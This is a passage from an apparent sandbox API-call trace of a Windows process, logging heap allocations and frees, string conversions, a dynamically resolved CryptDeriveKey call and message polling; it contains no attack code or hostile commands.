Flags=0x0, Size=0x4) returned 0x34a20c0 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0265.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0265.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x24aa8a8 [0265.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24aa8a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0265.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.266] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0265.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0265.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0265.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0265.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.266] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa59a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0265.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0265.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0265.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0265.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.274] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.274] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 